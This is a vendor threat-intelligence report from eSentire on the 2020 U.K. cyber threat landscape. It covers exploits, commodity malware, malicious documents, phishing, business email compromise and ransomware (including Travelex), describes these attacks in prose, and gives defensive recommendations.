2020 esentire threat intelligence spotlight: united kingdom · 2020 sentire hreat ntelligence...

Observations and Perspectives

2020 eSentire Threat Intelligence Spotlight: United Kingdom

3 FOREWARD

4 INTRODUCTION

4 Quantifying risk

5 The COVID Complication

7 THE U.K. THREAT LANDSCAPE

7 Remote Exploits

8 Commodity Malware

10 MalDocs

11 Phishing

12 Business Email Compromise

13 Ransomware and Hands-on-Keyboard Attacks

15 CONCLUSIONS AND GENERAL RECOMMENDATIONS

17 METHODOLOGY

18 REFERENCES

Table of Contents

32020 eSentire Threat Intelligence Spotlight: U.K. (June 2020)

ForewordIn the eSentire 2019 Annual Global Threat Intelligence Report, we shine a spotlight on

the pervasiveness of commodity malware, increased coordination across criminal groups,

business email compromise attacks and the rise of hands-on keyboard attacks associated

with ransomware.

In this report—our second to focus on the United Kingdom—we discuss trends observed in

our U.K. customer base over the past 12 months in context of the broader threat landscape.

The first few months of 2020 have created new opportunities for attackers as the world

grapples with COVID-19 and many organisations adopt work from home (WFH) policies

to maintain operations. For attackers, this sudden shift presents an expanded threat

surface featuring remote work technologies that were, in many cases, hastily introduced.

Our experience reveals that the more distributed a workforce and the more complex

the technology stack, the higher the likelihood of an organisation experiencing a

security incident.

Modern threats have shown the ability to readily bypass legacy antivirus solutions and

adversaries are adept at taking advantage of vulnerability windows. Organisations need

solutions that can harden endpoints, prevent polymorphic malware and fileless attacks,

mitigate malicious code execution and provide investigation and remediation capabilities

with dynamic response to security incidents.

This latter point—the need for rapid response and containment—cannot be overstated.

As unwelcome an idea as it is, every organisation should consider that it’s only a matter of

time until a serious security incident occurs.

The Managed Detection and Response (MDR) category, which eSentire pioneered and

continues to lead, is based on the combined premise that adversaries are always ahead of

defences, all businesses are at risk of a cyberattack at some point in time and that purely

preventative controls and traditional managed security solutions do not adequately protect

a business from potential threats.

To combat and contain threats, eSentire MDR provides full telemetry and visibility across

on-premises and cloud environments with integrated machine learning analysis, enabling

our Security Operations Centres (SOCs) to quickly detect and contain attacks, thereby

minimising the probability of a breach and lowering the risk to business operations.

https://www.esentire.com/resources/library/esentire-annual-threat-intelligence-report-2019-perspectives-and-2020-predictions


Introduction

Today’s organisations face a wide array of cyberthreats. As businesses adopt cloud-based services and employ

a distributed workforce (made even more distributed by the COVID-19 pandemic), this always-connected model

increases the attack surface—the collection of points a malicious actor can use to try to gain access.

While all organisations must manage these risks, small and medium businesses (SMBs) are particularly

vulnerable. Most SMBs generally don’t have access to the same resources and expertise as their enterprise

cousins, and the result is that their security posture—the overall security status of their infrastructure—has

failed to keep pace with either the expanding threat surface or the ongoing evolution of threats.

Unfortunately, the factors outlined above exist against a backdrop of a global shortage of cybersecurity

professionals.

Just how big is the gap? In a study released in November 2019, non-profit IT security organisation (ISC)2 stated

that, “the industry continues to struggle with a significant workforce shortage, and it would take another 4 million

professionals to close the gap.” 1

This shortage means that it can be very difficult for organisations of all sizes, even those which are sophisticated

and well-funded, to attract the level of cybersecurity expertise needed to harden defences against attacks.

Quantifying RiskThe most effective way to quantify the risk to U.K. organisations is to examine the recent past:

• A GDPR compliance survey commissioned by Egress stated that 37 percent of U.K. companies reported

a data breach incident to the Information Commissioner’s Office (ICO) in the preceding 12 months, with

17 percent reporting more than one incident.2

• The Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020 indicated

that 46 percent of U.K. businesses reported experiencing “any kind of cyber security breach or attack in

the last 12 months.” 3

• In the 2019 Ponemon State of Endpoint Risk Study, 68 percent of survey respondents indicated that their

organisations suffered an endpoint attack resulting in a data asset and/or IT infrastructure compromise.

• VMware Carbon Black’s Global Threat Report Series suggested that up to 88 percent of U.K. companies

suffered breaches in the 12 months preceding the report.4

Why is it so difficult to pin down a precise number? Beyond the usual challenges and biases inherent in surveys,

one other potential reason is that what constitutes an “event” varies. Often, cyberattacks are classified by

severity as events, incidents or breaches.


Introduction (cont.)

• Events include minor issues with no impact to business. This could be as simple as a firewall or

endpoint protection solution blocking an unauthorised attempt to connect to the network or preventing

malware installation.

• Incidents are more serious, and relate to violations of the firm’s cybersecurity, privacy or compliance

policies. Examples include unauthorised access to confidential data (like medical records or client files

at a law firm) or improper management of data by employees (such as transporting data on a USB drive).

An incident may not require official reporting to the governing regulatory authority.

• Some incidents become data breaches in which the exposure of non-public information meets a

specific legal definition, as defined by an industry regulator, privacy legislation or state breach legislation.

The Ponemon Cost of a Data Breach study reports that the average cost of a data breach in the U.K. is

£2.7 million.5

While it’s impossible to predict with precision the harm caused by any particular future incident, it’s still possible

to make informed strategic and operational decisions about managing cyber risk. To determine what is most

prudent and practical for your organisation requires understanding your own circumstances and the wider

cyberthreat environment.

By shining a light on cybercrime—including the players, their motivations, tactics and targets—we hope to bring

data and insights to conversations which can be dominated by opinion and guesswork.

The COVID ComplicationIn 2020, the world is grappling with the first modern pandemic. While governments rushed to “break the chain”

and “flatten the curve,” businesses faced ongoing existential crises and completely new remote working

scenarios—on top of the mental load of new professional and personal stressors.

Reports quickly emerged of threats using COVID-19 messages as lures, including a CoronavirusSafetyMeasures.

PDF which deploys a remote access tool (RAT) and malware,6 and a malicious Microsoft Office document

purportedly from the Ukrainian Ministry of Health which deploys keylogging and other malware. 7

The United States’ Federal Trade Commission reported in mid-April that scammers had already pulled in

$12 million USD in coronavirus-related scams, although the global figure is likely much higher. 8

On 8 April 2020, the U.K.’s National Cyber Security Centre (NCSC) and U.S. Department of Homeland Security

(DHS) Cybersecurity and Infrastructure Security Agency (CISA) issued a joint threat advisory.9

But COVID-related lures aren’t the only new development. With the dramatic increase in the use of remote

working tools—including VPNs, remote desktop and collaboration software 10—cybercriminals are focusing

commodity malware and drive-by activities on these technologies.


Introduction (cont.)

Here are a few tips to strengthen your defences. While these are general best practices, they are even more

important as threat actors opportunistically take advantage of confusion and chaos.

• Review remote access protocols: Criminals know your employees are working from home, frequently

employing VPNs. Be on the look-out for phishing lures designed to harvest VPN credentials and be sure to

reset passwords, require multi-factor authentication and restrict access to critical information not required

for everyday duties.

• Protect your endpoints, mobile and IoT devices: As more employees work remotely, it’s critical to expand

your umbrella of protection to include those distributed laptops, tablets and phones. Consider Endpoint

Protection Platforms (EPPs) and Endpoint Detection and Response (EDR) solutions.

• Inform your employees: Remind employees that criminals will attempt to take advantage of the chaos

created by COVID-19 through fraudulent invoicing and fake donation sites on social media. Remind your

employees to remain vigilant and follow security best practices.

• Don’t forget your supply chain: Speak to critical vendors to identify risks in your supply chain (perhaps

you have strong protocols for COVID-19, but your vendors might not).

For more recommendations specifically relating to securing your organisation during the pandemic, please see

our dedicated COVID-19 Cybersecurity Resources11 page.

https://www.esentire.com/covid19-cybersecurity-resources


The U.K. Threat Landscape

Like organisations everywhere, those operating in the U.K. face a range of threats. In each subsection to follow,

we outline a threat, provide direct observations or general commentary and outline some practical defences.

Remote ExploitsNetwork-borne exploits are a constant threat against connected systems. Attackers (perhaps the term “script

kiddies” would be more accurate) and “grey hat” researchers leverage a penetration testing tool like Metasploit

and scan networks for vulnerable devices, operating systems and applications.

Short-term changes are likely more the result of a new exploit being added to the scanning tools than anything

more meaningful; longer-term trends, though, can be instructive as they can suggest which vulnerabilities are

most at-risk.

Looking at higher-volume attempts observed in the U.K. between May 1, 2019 and April 30, 2020, Figure 1

shows that PHP exploits are a constant threat while attempts against IoT devices have increased. In addition to

an October surge in attacks against Zyxel home routers, we can also see an increase in Mirai botnet variants in

December 2019 (and lasting through at least the end of April 2020), which Palo Alto Networks’ Unit 42 attributed

to the return of ECHOBOT.12

Turning our attention to lower-volume attempts (Figure 2), we can see items worthy of note:

• Other home routers remain a very popular target, falling just below our threshold for high-volume attempts

• SQL exploits sharply declined at the end of 2019

• January, February and March 2020 showed a sudden jump in observed exploit attempts against Citrix 13

• A gradual increase in attempts using Remote Desktop Protocol (RDP)

These latter two observations are potentially related to the COVID-19 pandemic: Citrix exploits are often

associated with GoToMeeting, a popular virtual meeting tool and RDP is often used by remote workers

and IT organisations.

Figure 1—Higher-volume exploit attempts observed against eSentire's U.K. customer base


Remote Exploits (cont.)

Defence Recommendations

Most remote exploits can be mitigated by a combination of minimising the exposed threat surface and following

a diligent patching regime. Additionally, organisations should:

• Implement monitoring and detection of asset exposure to external networks

• Consider two-factor authentication for externally-facing remote access points

• Implement strong perimeter protections, such as application firewalls or IPS systems, to weed out known

attacks from reaching potentially vulnerable devices that must be exposed to provide services

Commodity MalwareCommodity malware is readily available (including as a service) and can be incorporated into highly automated

campaigns. Driven by significant financial rewards and operating as a mature industry, these malware threats

continue to evolve: 14

• Polymorphism creates an ever-changing threat that can readily bypass antivirus solutions, whether

traditional or powered by machine learning techniques, by rapidly mutating into new variants

• Fileless malware has soared in prevalence since 2017; this threat leverages existing software,

permitted applications and authorised protocols to carry out malicious activities

• Many malware families can detect when they are being executed in a sandbox, allowing them to

actively thwart security research

• Access to offensive security tools and compromise-as-a-service has lowered the barriers for entry,

allowing lower-skilled groups to punch above their weight

Often, malware will arrive through email disguised as a software update (in the U.K. we observed malware

impersonating browser updates, Adobe Flash and Wi-Fi cameras) or through a browser via a drive-by download.

Commodity malware caused 21 percent of the serious incidents we observed directly in the U.K., with attacks

attributable to five malware families: XMR Coinminer, MoqHao, SocGholish, Shlayer and MsraMiner.

Figure 2—Lower-volume exploit attempts observed against eSentire's U.K. customer base


Example: Containment in Just 22 Minutes

As evidenced by the Travelex incident (outlined on pg.12) and other high-profile attacks, minimising threat actor

dwell time is a crucial element of avoiding or limiting the consequences of a security incident.

In May 2019, esENDPOINT alerted the eSentire SOC to a potential threat within one of our financial clients: in an instance of a drive-by download, a user on a monitored corporate asset unknowingly downloaded and launched

a malicious JavaScript file via Internet Explorer.

SOC analysts reviewed network traffic captured at the time of the compromise and discovered that a potentially

malicious web redirect via a website related to the SocGholish cybercrime campaign may have instigated the infection.

Once the malicious JavaScript file was executed, it downloaded two other tools, one of which took two screenshots of the infected machine’s desktop. Network traffic revealed that the screen shots were sent back to the attacker,

potentially as a means of gaining intelligence about the environment in which the payload was activated.

The second tool downloaded was a remote control launcher. It was saved to the disk, renamed and then executed. Once executed, it launched the built-in Windows Remote Access Tool which was recorded establishing a connection to an external channel, which is the likely command-and-control channel that was used for the

malicious activity that immediately followed.

Just a few seconds after the remote control session was created via the Remote Assistance tool, some persistent malware was installed on the victim host. From there, lateral movement began. By this point, about 10 minutes

had passed since the initial JavaScript download.

An encoded PowerShell command was executed that downloaded an RC4-encrypted second-stage PowerShell script and launched it. As soon as the attacker used a PowerShell command, eSentire’s proprietary BlueSteel

machine learning tool picked up on the suspicious activity and another alert was generated.

The command was executed under the user’s normal account, without local admin privileges. After downloading and decrypting the second-stage PowerShell script, the attacker performed a scan of the local network for the purpose of infecting additional machines on the network. Two additional hosts on the local network were subsequently compromised through use of a lateral movement PowerShell script and Windows Management

Instrumentation (WMI) remote PowerShell invocation.

The combination of esENDPOINT (which detected the malicious JavaScript file), machine learning from BlueSteel (which detected the malicious PowerShell command) and esNETWORK (which alerted on the suspicious web redirect) traced the entire attack, allowing rapid synthesis and remediation of the threat before the attacker could reach their objective. Our SOC team successfully isolated the three compromised hosts and terminated the

attacker’s command and control channel, preventing further activities.

The total elapsed time from JavaScript download to attack containment was 22 minutes.

16:38:05 UTC – Initial infection on host STM112 via malicious JS script

16:38:23 UTC – Remote control session established to the attacker

16:54:55 UTC – Host STM34 compromised via WMI remote PowerShell invocation

16:38:27 UTC – Screenshots of victim’s desktop taken and sent to attacker

16:55:00 UTC – Host STM33 compromised via WMI remote PowerShell invocation

16:52:08 UTC – Lateral movement PowerShell script executed by attacker

16:43:48 UTC – Persistent malware installed on host STM112

17:00:00 UTC – SOC sends malware alert to customer and quarantines the affected hosts



To improve defences against commodity malware, we recommend that organisations:

• Deliver malware awareness training to institute best practices (for example, mousing-over links to inspect them, examining sender details, reporting anything suspicious, not clicking links, contacting/verifying the sender and request by a different channel)

• Keep browsers up to date and employ security strategies including disabling JavaScript

• Enforce the use of multi-factor authentication for corporate email accounts

• Deploy spam filtering, URL rewrite and attachment sandboxing

• Block macros in Microsoft Office documents that originate from the internet

• Block Microsoft Office execution from temporary directories such as Outlook and internet browsers

• Ensure employees are particularly cautious of generic Office 365-related communications

Additionally, administrators may want to implement rules to redirect emails, including redirecting storage service

links to a monitored inbox.

MalDocsMany malware families—including Emotet, Ursnif and Dridex—most frequently gain initial access through an

attachment disguised as an invoice or other important file either sent directly to financial departments or

through an intermediary. The term “malicious document” refers to these files; while the attachments are often

weaponised Microsoft Office files, malicious JavaScript files and other formats are not uncommon.

This approach requires human interaction to initiate the malicious activities; like phishing, MalDocs are attractive

for attackers because they target human operators as the initial attack vector. Upon successful infection, the

malware can spread laterally to other hosts in the network. If left untreated, response and clean-up can become costly.

Threat actors are constantly adjusting their MalDoc lures to optimise open rates. MalDocs caused 36 percent of

the serious incidents we observed in the U.K., with the most frequently observed lures being:

1. Quotes and RFQs

2. Invoices, Purchase Orders and Shipping Documents

3. Financial Statements, Account Statements and Bank Notifications

4. Scanned Documents


Because email is the most common attack vector for MalDocs, organisations can improve defences by ensuring they:


• Deploy spam filtering, URL rewrite and attachment sandboxing; administrators may also want to implement

rules to redirect emails, including redirecting storage service links to a monitored inbox


• Deliver MalDoc awareness training to institute best practices (ex: taking time to inspect and examine

before opening attachments, examining sender details, reporting anything suspicious, not clicking links,

contacting/verifying the sender and request by a different channel)



Phishing

Of the incidents we observed in which there was a credential dump, domain controller compromise or other

serious bypass of defences, 36 percent were attributable to a successful phishing attack.

Phishing’s goal is to deceive a human operator into taking an action that benefits the attacker, such as disclosing

sensitive information or downloading and executing a malicious file. Because phishing relies on tricking a victim,

it is an attractive technique to attackers as security postures steadily harden.

Threat actors employ multiple phishing methods, including sending links, attaching malicious documents or

engaging in social engineering to compromise the user. While email remains the most frequent medium, social

media, text and messaging apps are also employed and may take advantage of higher user trust (or lower user

threat awareness).

Attackers rely on a range of lures, which are tweaked and managed in much the same way that legitimate

businesses manage their own email campaigns. In 2019, the top lures we saw in the U.K. were:

1. Site/Service (e.g., Apple, eBay)

2. Email (e.g., Office 365, Hotmail, generic account verifications)

3. Financial (e.g., income tax, PayPal)

4. File Share (e.g., Dropbox, OneDrive)

5. Company Event

Phishing in the Cloud with Customised Office 365 Pages

In our Annual Threat Intelligence Report: 2019 Perspectives and 2020 Predictions, we revealed that

threat actors have embraced the cloud for phishing campaigns. Because many organisations use cloud services

legitimately, it’s difficult to configure filtering defences—whether by IP or by URL—which will not also interfere with

regular business operations.

In the report, we outlined a phishing campaign using Microsoft Azure cloud services to host Office 365 phishing pages.

Since publishing that report in January 2020, eSentire Threat Intelligence continued to research this emerging trend.

One recent finding is that in addition to deploying convincing Office 365 phishing attacks by hosting pages on

trusted cloud services, attackers have added the ability to automatically customise these pages to the target

organisation’s branding (Figure 3).

Figure 3—Microsoft allows organizations to customise their Office 365 login page for users to match company branding; attackers have developed techniques to customise this branding to impersonate trusted log-in pages, as this proof-of-concept illustrates

https://www.esentire.com/resources/library/esentire-annual-threat-intelligence-report-2019-perspectives-and-2020-predictions


Phishing in the Cloud with Customised Office 365 Pages (cont.)

This technique appears to abuse a Microsoft feature meant to allow companies to customise the Office 365

login page for their users. By customising the Office 365 branding automatically and in real time, this technique

reduces the effort required for conducting convincing phishing attacks at scale.

In nearly all cases of cloud-hosted phishing, the heavy lifting is performed by a separate, attacker-controlled

website. This site hosts a number of PHP scripts which validate the target email, proxies’ requests for branding

files and collects and stores credentials.

For more information about this evolving threat, please see the eSentire blog post New BOLO: Phishing

Attacks that Customize O365 Pages with Your Branding, which includes details, defence recommendations

and indicators.15


To defend against phishing attacks, we recommend organisations:

• Enforce the use of multi-factor authentication for corporate email accounts

• Deliver phishing awareness training to institute best practices (for example, mousing-over links to inspect them, examining sender details, reporting anything suspicious, not clicking links, contacting/verifying the sender and request by a different channel)

• Introduce procedures for reporting phishing and sharing confirmed reported phishing attempts, which help employees quickly identify phishing indicators

• Deploy spam filtering, URL rewrite and attachment sandboxing




Additionally, administrators may want to implement rules to redirect emails, including redirecting storage service

links to a monitored inbox

Business Email Compromise

Business email compromise aims at facilitating fraudulent money transfers via two methods:

• Account takeover, in which an attacker gains complete access to and control over a victim’s email account.

• Account impersonation, in which an attacker attempts to fool a victim into taking some unknowingly

malicious action (often at the behest of an authority figure or colleague).

Threat actors use these accounts, which often belong to executives, to request new payments and to hijack/

redirect upcoming payments.

In some instances, business email compromise becomes just one tool within a larger “cultural engineering” attack.

For example, a special report in Private Equity Wire described a 2019 attack in which attackers—through patience and

sophistication—tricked three finance sector firms into transferring £1.1M, of which only half was recovered.16



To defend against the financial risks of account takeovers (beyond the defences which should be in place to

prevent the initial takeover) and impersonation, we recommend that organisations enforce usage of out-of-band

communications to confirm and authorize large transactions.

Additionally, organisations should:

• Educate employees about impersonation attacks, including showing real examples with screenshots

and redacted personal and numerical info.

• Ensure everyone in the company, including executives, follows security and operational processes;

importantly, executives should set an example by strictly adhering to any processes in place, so that

any requests that do not follow the established process stand out as inherently unusual.

• Suggest that employees who are not required to be public-facing should avoid posting their corporate

email address on networking sites such as LinkedIn.

Ransomware and Hands-on-Keyboard Attacks

Although we did not directly observe any such successful attacks within our U.K. customer base, 2019 saw

a jump in ransomware specifically targeting enterprise networks. In particular, threat actors enjoyed success

targeting organisations including governments, Managed Service Providers (MSPs) and large businesses—

entities which have an urgent motivation to avoid downtime and easier access to larger funds than most

individual targets.

These sophisticated, targeted attacks require much more manual effort and attention and so earn the qualifier

“hands-on-keyboard.” These attacks differ from early ransomware activity, which opportunistically infected

individual users, largely through automated means including malicious emails and drive-by downloads.

The inflection point may have been the extremely destructive Atlanta ransomware event in March 2018,

perpetrated by the SamSam group, which caused millions of dollars of damage and significant downtime to

public services. At the same time, commodity ransomware has received considerable attention from the security

community (especially following WannaCry) and observed coinmining attacks exhibit fluctuation with the market

price of cryptocurrency.

Research and observations suggest that a significant proportion of 2019’s hands-on-keyboard ransomware

incidents can be traced to a relatively small number of malware groups: SamSam, RyU.K., Robbinhood, REvil

(Sodinokibi), GoGalocker and GlobeImposter.

Travelex: A Portent of a New Threat

As the calendar flipped to 2020 a sophisticated attack was reaching a crescendo: after initially declaring a

global system outage as maintenance downtime, Travelex disclosed a week later that they were the victims of a

cyberattack dating to 31 December 2019.

As new details came to light, they painted a picture of a new multifaceted threat.


Travelex: A Portent of a New Threat (cont.)

What immediately emerged was that Travelex’ operations were severely disrupted by a massive ransomware

attack, believed to be perpetrated by the REvil group, in which the attackers were demanding £4.6 million. 17

News coverage suggested that the service outages were so severe that Travelex was forced to conduct

currency transactions with manual calculations in their exchange offices.

Subsequent reports indicated that the attackers were threatening to release 5 GB data including the dates

of birth, credit card information and national insurance numbers of Travelex clients.18 This threat effectively

weaponises the fines built into GDPR as yet another way of applying pressure—beyond the impact to Travelex’

daily business operations and the damage already done to the company’s reputation.

Two initial questions asked by observers were:

1. How did the ransomware hit so much of Travelex’ network simultaneously?

2. How did the attackers acquire the data they were threatening to release?

The answer to both questions seems to be that the attackers had extensive access to Travelex’ systems for

up to six months.19

It is believed that after gaining initial access (suspicion immediately fell on vulnerable Pulse Secure VPN servers20),

the attack operators evaded defences by employing hands-on-keyboard techniques; that is, the attack—at least

to some extent—was manually directed. This approach, which often leverages stolen or purchased credentials,

allowed the attackers to learn the lay of the land, quietly exfiltrate the private data and plant the ransomware

“bombs” throughout the Travelex network.

Then, on 31 December, those bombs were detonated, ultimately costing Travelex untold sums in brand damage

and lost business, plus the nearly £1.9 million bitcoin ransom The Wall Street Journal reported they paid.21

This incident confirms that ransomware attacks have transitioned from opportunistic nuisance to aggressive,

well-planned and multi-faceted extortion. Further, it demonstrates the destructive capability of systemic

ransomware designed to cripple large organisations and not just exploit small sums of cryptocurrency from

individuals and small businesses.


As a general defence against ransomware, we recommend that organisations maintain frequent secondary

and redundant backups of all essential systems and files either offline or in a segregated environment,

extending back for a long period (as ransomware can lie dormant for many months).

Additionally, because executing an attack of this magnitude and with this amount of manual effort requires

an exceptionally long dwell time, Managed Detection and Response (MDR) services offer an advantage in

containing the threats prior to the activation of encryption.


Conclusions and General Recommendations

U.K. businesses and organisations are threatened by motivated actors armed with an arsenal of tools and

tactics. From remote exploits and commodity malware to phishing, business email compromise and increasingly

sophisticated and highly manual attacks, the cyber risks have never been greater.

While the recommendations presented so far are oriented towards the IT department, senior executives must

play an important role in securing a business. To help, in 2019 the National Cyber Security Centre (NCSC)

released its Board Toolkit which outlines key obligations and priorities for board members and senior

executives in the U.K.

We strongly recommend that executives leverage this toolkit so that they can familiarise themselves with the

information required to make informed decisions about the risks their businesses face. Once armed with this

information, executives are encouraged to evaluate and prioritise the risk management programs they need

to put in place, including implementing effective cybersecurity measures and collaborating with suppliers and

partners to mitigate security threats.

The most secure organisations prioritise cybersecurity as an investment in business continuity and brand

reputation, rather than a burdensome expense or simply an IT matter.

A few years ago, the announcement and introduction of the European Union’s General Data Protection

Regulation (GDPR) forced companies to take a serious look at how they protect personal data. According to The

Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020, in doing so the GDPR

“played a major role in getting organisations to review and update cyber security policies and processes.” 22

Plus, several high-profile incidents—particularly those experienced by Marriott and British Airways—have shown

that there are significant financial consequences for organisations who fail to protect customer data, with the

Information Commissioner’s Office (ICO) ruling that each had breached data protection laws and announcing in

July 2019 that it had the intention to fine the two companies £99 million and £183.4 million, respectively. 23,24

Unfortunately, there are signs that the attention brought to cybersecurity by GDPR has waned, with the

Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020 also concluding that

since the initial round of updates, “many of these improvements have been maintained but not enhanced.”

On a similar note, a recent report on Data Protection Authorities’ (DPAs) capacity to enforce against GDPR

infringements raises concerns about the efficacy of the legislation.25 If companies conclude that DPA

enforcement is lacking and the risk of regulatory penalties is low, then their cybersecurity investments could

fall below the levels needed to keep pace with motivated threat actors.

Nevertheless, the ICO remains busy during the global pandemic. In mid-May 2020, news emerged that EasyJet

had experienced a “highly-sophisticated cyberattack” affecting approximately nine million customers and that

the airline had informed the ICO about the incident, which was detected in January. In relation to the incident, the

ICO stated that “People have a right to expect that organisations will handle their personal information securely

and responsibly. When that doesn't happen, we will investigate and take robust action where necessary.”26


While the degree of risk is difficult to ascertain precisely, it’s reasonable to conclude that it’s only a matter of

time before an organisation suffers a cybersecurity incident. This realistic mindset highlights the importance of

minimising threat actor dwell time. Recall the Travelex example and consider that most criminals need only

15-25 hours to breach perimeter defences, identify valuable data and extract it.27

Faced with such sophisticated attackers and techniques, detecting a threat and being able to respond effectively

requires coverage of the entire threat surface.

Finally, while no defence is impenetrable—in fact, because no defence is impenetrable—it is vital that

organisations invest in a response capability, whether internally or through a third-party.

For more cybersecurity information, resources and guidance, please see our Resource Library.28

https://www.esentire.com/resources/library


Methodology

eSentire Threat Intelligence used data gathered from April 2019 to May 2020 from approximately 500

proprietary network and host-based detection sensors distributed within the United Kingdom across multiple

industries. Raw data was normalised and aggregated using automated machine-based processing methods.

Processed data is reviewed by a visual data analyst applying quantitative analysis methods. Quantitative

intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a

written analytical product.


References

[1] See (ISC)² Estimates Cybersecurity Workforce at 2.8 Million

[2] The survey is available at: https://pages.egress.com/GDPR-survey-2019-uslp.html

[3] The survey is available at: https://www.gov.U.K./government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

[4] VMware Carbon Black’s reports are housed at: https://www.carbonblack.com/resources/threat-research/global-threat-report-series/

[5] The report is available at: https://securityintelligence.com/posts/whats-new-in-the-2019-cost-of-a-data-breach-report/

[6] See Spread of Coronavirus-Themed Cyberattacks Persists with New Attacks

[7] See this MalwareHunterTeam Twitter post

[8] See Coronavirus-related scams rack up $12 million

[9] The release is available at: https://www.cisa.gov/news/2020/04/08/U.K.-and-us-security-agencies-issue-covid-19-cyber-threat-update

[10] An ISACA survey on the impact of COVID reports that 87 percent of respondents say the rapid requirement to work from home increased the risk of data privacy and protection issues

[11] https://www.esentire.com/covid19-cybersecurity-resources

[12] See Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities

[13] This increase may be associated with CVE-2019-19781, but we have not investigated further

[14] The eSentire 2019 Annual Global Threat Intelligence Report explains in some depth how Emotet, Ursnif and Dridex rapidly evolve tactics to maximise campaign effectiveness

[15] https://www.esentire.com/blog/new-bolo-phishing-attacks-that-customize-o365-pages-with-your-branding

[16] For a thorough explanation of how these attacks were executed, see Microsoft Office 365 heist highlights sophistication of cultural engineering cyber attacks

[17] In early January, CSO Online posted U.K.’s Travelex hit by ‘big game’ REvil ransomware attackers

[18] Per Travelex being held to ransom by hackers

[19] Per Travelex being held to ransom by hackers

[20] In early January, CSO Online posted U.K.’s Travelex hit by ‘big game’ REvil ransomware attackers

[21] As reported in Travelex Paid Hackers Multimillion-Dollar Ransom Before Hitting New Obstacles

[22] The survey is available at https://www.gov.U.K./government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

[23] See Statement: Intention to fine Marriott International, Inc more than £99 million under GDPR for data breach

[24] See Intention to fine British Airways £183.39m under GDPR for data breach

[25] See Europe’s governments are failing the GDPR

[26] See EasyJet admits data of nine million hacked

[27] Some surveys and studies suggest even faster timeframes; for instance, The Black Report 2018, published by Nuix, includes a broad distribution of figures ranging as low as one hour. The report states that, “Across all industries, most of the professional hackers surveyed said they could bypass security systems, locate critical data, and exfiltrate that data within 15 hours.”

[28] https://www.esentire.com/resources/library


eSentire, Inc., the global leader in Managed Detection and Response (MDR), keeps organisations safe from constantly evolving

cyberattacks that technology alone cannot prevent. Its 24x7 Security Operations Centres (SOC), staffed by elite security analysts,

hunts, investigates and responds in real-time to known and unknown threats before they become business disrupting events.

Protecting more than $6 trillion AUM, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and

the ability to comply with growing regulatory requirements. For more information, visit www.esentire.com and follow @eSentire.